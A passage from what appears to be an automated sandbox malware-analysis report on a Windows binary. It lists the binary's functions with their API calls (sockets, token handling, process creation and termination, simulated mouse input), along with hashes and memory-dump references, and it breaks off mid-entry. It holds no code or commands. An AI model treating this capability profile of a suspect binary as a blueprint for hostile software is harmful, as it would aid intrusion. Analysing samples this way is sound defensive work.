                                                          • Opcode Fuzzy Hash: 128b32e2e1e3d9622c3624d876ddf17de8b7b85f80327aecd4aa668ef4832dc4
                                                          • Instruction Fuzzy Hash: 9B514471208244AFD714EF68C885E6BBBA9FF89314F04491DF589872A2DB31E905DB92
                                                          Function 00965DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenu.USER32(?,00000001,00000000), ref: 00965E38
                                                          • GetMenuItemCount.USER32(00000000), ref: 00965E6F
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00965E97
                                                          • GetMenuItemID.USER32(?,?), ref: 00965F06
                                                          • GetSubMenu.USER32(?,?), ref: 00965F14
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00965F65
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: b16b9758c8a04c531cd0766cfe70f7c48f021baeaaaed3f139b78aa46461ba34
                                                          • Instruction ID: f9ce7ece99e87280169f8bc55f2b63ff592a69aae3e111b18d158a8d6ceb4c6f
                                                          • Opcode Fuzzy Hash: b16b9758c8a04c531cd0766cfe70f7c48f021baeaaaed3f139b78aa46461ba34
                                                          • Instruction Fuzzy Hash: C651AE36A00619EFCF11EFA4C845AAEB7B5EF88310F114459F905BB391CB35AE41CB91
                                                          Function 0093F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #8.OLEAUT32(?,00000000,?,?,?,?,?,?,00000024), ref: 0093F6A2
                                                          • #9.WSOCK32(00000013,?,?,?,?,00000024), ref: 0093F714
                                                          • #9.WSOCK32(00000000,?,?,?,?,00000024), ref: 0093F76F
                                                          • _memmove.LIBCMT ref: 0093F799
                                                          • #9.WSOCK32(?,?,?,?,?,00000024), ref: 0093F7E6
                                                          • #12.WSOCK32(?,?,00000000,00000013,00000000,?,?,?,?,?,?,00000024), ref: 0093F814
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 2f6b6bd5edf14f0e9da81f1cc531d7c45bd07da970f2b827361a9acb9d962841
                                                          • Instruction ID: 3330f5ecb4e498ead3441d87b579e80456b0cb19699248563614b30dfc8eaccc
                                                          • Opcode Fuzzy Hash: 2f6b6bd5edf14f0e9da81f1cc531d7c45bd07da970f2b827361a9acb9d962841
                                                          • Instruction Fuzzy Hash: 6C514BB5A00209EFCB14CF58C894AAAB7B8FF4C314F15856AE959DB350E730E951CFA0
                                                          Function 009429B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 009429FF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,000000FF,000000FF,009A7890,00000000,000BED90), ref: 00942A4A
                                                          • IsMenu.USER32(00000000), ref: 00942A6A
                                                          • CreatePopupMenu.USER32(009A7890,00000000,000BED90), ref: 00942A9E
                                                          • GetMenuItemCount.USER32(000000FF), ref: 00942AFC
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00942B2D
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 2effc0d959d47dbf82385f8a0c0c898481467ad4c44c8294e74da7583c983dc4
                                                          • Instruction ID: 3164f14021ab33860e9eca3188077a19fb929426c4e58ada5bc8aacb317f36a7
                                                          • Opcode Fuzzy Hash: 2effc0d959d47dbf82385f8a0c0c898481467ad4c44c8294e74da7583c983dc4
                                                          • Instruction Fuzzy Hash: 64519D70600209EBDF25CFA8D888FAEBBF8FF45314F504559F8159B2A1D7709944CB61
                                                          Function 008E1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 008E1B76
                                                          • GetWindowRect.USER32(?,?), ref: 008E1BDA
                                                          • ScreenToClient.USER32(?,?), ref: 008E1BF7
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008E1C08
                                                          • EndPaint.USER32(?,?), ref: 008E1C52
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 57e99e193dee95cd71adaa046379844ec73d921fb3be7e4a5e3e09a83864cd99
                                                          • Instruction ID: dcc3fd611faccec483bcdaf46c255d5a7fd588614660bf6bede8d57694299633
                                                          • Opcode Fuzzy Hash: 57e99e193dee95cd71adaa046379844ec73d921fb3be7e4a5e3e09a83864cd99
                                                          • Instruction Fuzzy Hash: C8419071208244AFDB10DF29CCC9FBA7BE8FB86764F140669F959C72A1C7309845EB61
                                                          Function 0096BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(009A77B0,00000000,?,?,?,009A77B0,?,0096BC1A,?,?), ref: 0096BD84
                                                          • EnableWindow.USER32(?,00000000,?,0096BC1A,?,?), ref: 0096BDA8
                                                          • ShowWindow.USER32(009A77B0,00000000,?,?,?,009A77B0,?,0096BC1A,?,?), ref: 0096BE08
                                                          • ShowWindow.USER32(?,00000004,?,0096BC1A,?,?), ref: 0096BE1A
                                                          • EnableWindow.USER32(?,00000001,?,0096BC1A,?,?), ref: 0096BE3E
                                                          • SendMessageW.USER32(?,0000130C,?,00000000,?,?,?,009A77B0,?,0096BC1A,?,?), ref: 0096BE61
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 05c21c071ab904e8c6bae1a2a0adf3e7ddd6cf55a8ed1353315de7c4227054a8
                                                          • Instruction ID: 5e45fa2703bd9f1ee4b714e61ce5f605daa06007d9453bd5f88c78fdbf680e29
                                                          • Opcode Fuzzy Hash: 05c21c071ab904e8c6bae1a2a0adf3e7ddd6cf55a8ed1353315de7c4227054a8
                                                          • Instruction Fuzzy Hash: 0D416175604144EFDB26CF14C499BD47BE9FF45314F1841AAEA4CCF2A2D732A885CB91
                                                          Function 00957788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,0095550C,?,?,00000000,00000001), ref: 00957796
                                                            • Part of subcall function 0095406C: GetWindowRect.USER32(?,?), ref: 0095407F
                                                          • GetDesktopWindow.USER32(?,?,?,?,0095550C,?,?,00000000,00000001), ref: 009577C0
                                                          • GetWindowRect.USER32(00000000,?,?,?,0095550C,?,?,00000000,00000001), ref: 009577C7
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001,?,?,?,?,?,0095550C,?,?,00000000,00000001), ref: 009577F9
                                                            • Part of subcall function 009457FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945877
                                                          • GetCursorPos.USER32(?,?,?,?,?,?,0095550C,?,?,00000000,00000001), ref: 00957825
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000,?,?,?,?,?,?,?,0095550C,?,?,00000000), ref: 00957883
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: 891a47070e79ed6178b87290ef7acf339ac5aea9b985222c8eb555f631749c6e
                                                          • Instruction ID: f97d8cdad6afbbf4eebd9f6814bc863fd7ff698b54d9adc1f277ca2df8c684d7
                                                          • Opcode Fuzzy Hash: 891a47070e79ed6178b87290ef7acf339ac5aea9b985222c8eb555f631749c6e
                                                          • Instruction Fuzzy Hash: 6E31B072508315ABD720DF55D849F9BB7A9FFC8314F000929F98997191CA70EA48CBA2
                                                          Function 0095696E Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009569C7
                                                          • #111.WSOCK32(00000000), ref: 009569D6
                                                          • #2.WSOCK32(00000000,?,00000010), ref: 009569F2
                                                          • #13.WSOCK32(00000000,00000005), ref: 00956A01
                                                          • #111.WSOCK32(00000000), ref: 00956A1B
                                                          • #3.WSOCK32(00000000,00000000), ref: 00956A2F
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #111
                                                          • String ID:
                                                          • API String ID: 568940515-0
                                                          • Opcode ID: 0751fac800d3f6a05fb111fc95fd1a3b25ac480f3d94ec1e1e3132594d0a3434
                                                          • Instruction ID: be6ce280b449c5617fa14d8c69e8ac7a8658465796cf0d82bf0797286e406c71
                                                          • Opcode Fuzzy Hash: 0751fac800d3f6a05fb111fc95fd1a3b25ac480f3d94ec1e1e3132594d0a3434
                                                          • Instruction Fuzzy Hash: 9721D035200604AFCB10EF69CC89B6EB7A9EF85721F148558F85AE7391CB70AC45DB91
                                                          Function 00939431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00938CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00938CDE
                                                            • Part of subcall function 00938CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00938CE8
                                                            • Part of subcall function 00938CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00938CF7
                                                            • Part of subcall function 00938CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00938CFE
                                                            • Part of subcall function 00938CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00938D14
                                                          • GetLengthSid.ADVAPI32(?,00000000,0093904D), ref: 00939482
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0093948E
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00939495
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 009394AE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,0093904D), ref: 009394C2
                                                          • HeapFree.KERNEL32(00000000), ref: 009394C9
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: 496afe457ff2b62e7e054dc4d6e1544dad41b7d9b1c2c08feb0bd3947070d48f
                                                          • Instruction ID: b19c862f94556717d3990c57b6e24b0f2cb6705941969c28899b333a1b71fd95
                                                          • Opcode Fuzzy Hash: 496afe457ff2b62e7e054dc4d6e1544dad41b7d9b1c2c08feb0bd3947070d48f
                                                          • Instruction Fuzzy Hash: C511AC72515615FFEB109FA4CC09BAF7BADFB85316F108018E88A97220C77A9942DF60
                                                          Function 009391CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00939200
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00939207
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00939216
                                                          • CloseHandle.KERNEL32(00000004), ref: 00939221
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00939250
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00939264
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: faedccc15964430991c1d2125af4c006c87607e95d9db07f3c9c68de4ba06c6a
                                                          • Instruction ID: 809216461ce8b0614e17d3010daaea14d5e3ecd834f1780b35fcba14d3243f1a
                                                          • Opcode Fuzzy Hash: faedccc15964430991c1d2125af4c006c87607e95d9db07f3c9c68de4ba06c6a
                                                          • Instruction Fuzzy Hash: FE11477250520AEBDB018FA4ED49BDA7BA9EB49304F044054FA09A2160C2B69DA0EB60
                                                          Function 0093C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000,?,?,?,80004003), ref: 0093C34E
                                                          • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 0093C35F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 0093C366
                                                          • ReleaseDC.USER32(00000000,00000000,?,?,80004003), ref: 0093C36E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0093C385
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0093C397
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: cd9cbe526baaeb9963db8561e89b7e4a1777591cccd97a06525115f66e7ceb6d
                                                          • Instruction ID: f063421534db25423c6387167d0aa26a26ebc8e79476fcf1cab98c6b83c8aee8
                                                          • Opcode Fuzzy Hash: cd9cbe526baaeb9963db8561e89b7e4a1777591cccd97a06525115f66e7ceb6d
                                                          • Instruction Fuzzy Hash: 1D0148B5E04615BBDF105BA59C45B5EBFB8EF88761F004065FA08A7280D6709D10DF50
                                                          Function 0096C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008E1729
                                                            • Part of subcall function 008E16CF: SelectObject.GDI32(?,00000000), ref: 008E1738
                                                            • Part of subcall function 008E16CF: BeginPath.GDI32(?), ref: 008E174F
                                                            • Part of subcall function 008E16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 008E1778
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000,00000000,00000000,000000FF,00000000,00000001,?,?,?,0096C498,00000000), ref: 0096C57C
                                                          • LineTo.GDI32(00000000,00000003,?,?,0096C498,00000000), ref: 0096C590
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000,?,0096C498,00000000), ref: 0096C59E
                                                          • LineTo.GDI32(00000000,00000000,?,?,0096C498,00000000), ref: 0096C5AE
                                                          • EndPath.GDI32(00000000,00000000), ref: 0096C5BE
                                                          • StrokePath.GDI32(00000000,00000000), ref: 0096C5CE
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: 7778e8d88137c77c690eb4b2035c2461b20145c5c908813346789a1a7fa8cefa
                                                          • Instruction ID: ac854bb9db1be72685f829097aeadf070095166eae0d041923cc1390f8667f0e
                                                          • Opcode Fuzzy Hash: 7778e8d88137c77c690eb4b2035c2461b20145c5c908813346789a1a7fa8cefa
                                                          • Instruction Fuzzy Hash: 4D110C7200810CBFDF029F94DC88FEA7F6DEF04364F048011B95996160C771AD95EBA0
                                                          Function 009007BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,008EAB12), ref: 009007EC
                                                          • MapVirtualKeyW.USER32(00000010,00000000,?,?,?,008EAB12), ref: 009007F4
                                                          • MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,008EAB12), ref: 009007FF
                                                          • MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,008EAB12), ref: 0090080A
                                                          • MapVirtualKeyW.USER32(00000011,00000000,?,?,?,008EAB12), ref: 00900812
                                                          • MapVirtualKeyW.USER32(00000012,00000000,?,?,?,008EAB12), ref: 0090081A
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: e6ce98602eadc78f311a264ac248fe7f29b44bc3d3a035b84335d0a50c0533ed
                                                          • Instruction ID: 1f17ba811c0cb71515bc095e910df22863f25193ab0453a4f9a973b9b67ecef9
                                                          • Opcode Fuzzy Hash: e6ce98602eadc78f311a264ac248fe7f29b44bc3d3a035b84335d0a50c0533ed
                                                          • Instruction Fuzzy Hash: DC016CB0901759BDE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                          Function 009459A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009459B4
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009459CA
                                                          • GetWindowThreadProcessId.USER32(?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009459D9
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009459E8
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009459F2
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009459F9
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
